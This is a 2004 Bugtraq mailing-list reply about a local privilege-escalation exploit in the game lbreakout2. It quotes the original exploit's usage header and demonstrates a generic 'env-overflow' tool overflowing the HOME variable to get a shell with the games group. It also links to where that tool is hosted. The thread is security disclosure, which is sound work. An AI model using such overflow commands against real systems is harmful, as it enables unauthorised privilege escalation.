Bugtraq mailing list archives
Re: lbreakout2 < 2.4beta-2 local exploit
From: Steve Kemp <steve () steve org uk>
Date: Mon, 23 Feb 2004 20:26:03 +0000
On Sun, Feb 22, 2004 at 01:45:45PM -0000, Li0n7 () voila fr wrote:
/* * lbreakout2 < 2.4beta-2 local exploit by Li0n7 () voila fr * vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485 () student uu se> * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]] * */
I much prefer mine ;) Using the `env-overflow` tool this may be exploited without the need for a valid X11 display - ie. ssh/telnet access sufficient - or any explicit coding: skx@uml:~$ ./env-overflow /usr/games/lbreakout2 1084 HOME ... snip ... sh-2.05a$ sh-2.05a$ id uid=1000(skx) gid=100(users) egid=60(games) groups=100(users) Where env-overflow lives here: http://www.steve.org.uk/Hacks/generic.html Steve -- # Debian Security Audit Project http://www.shellcode.org/Audit/
Current thread:
- lbreakout2 < 2.4beta-2 local exploit Li0n7 (Feb 23)
- Re: lbreakout2 < 2.4beta-2 local exploit Steve Kemp (Feb 23)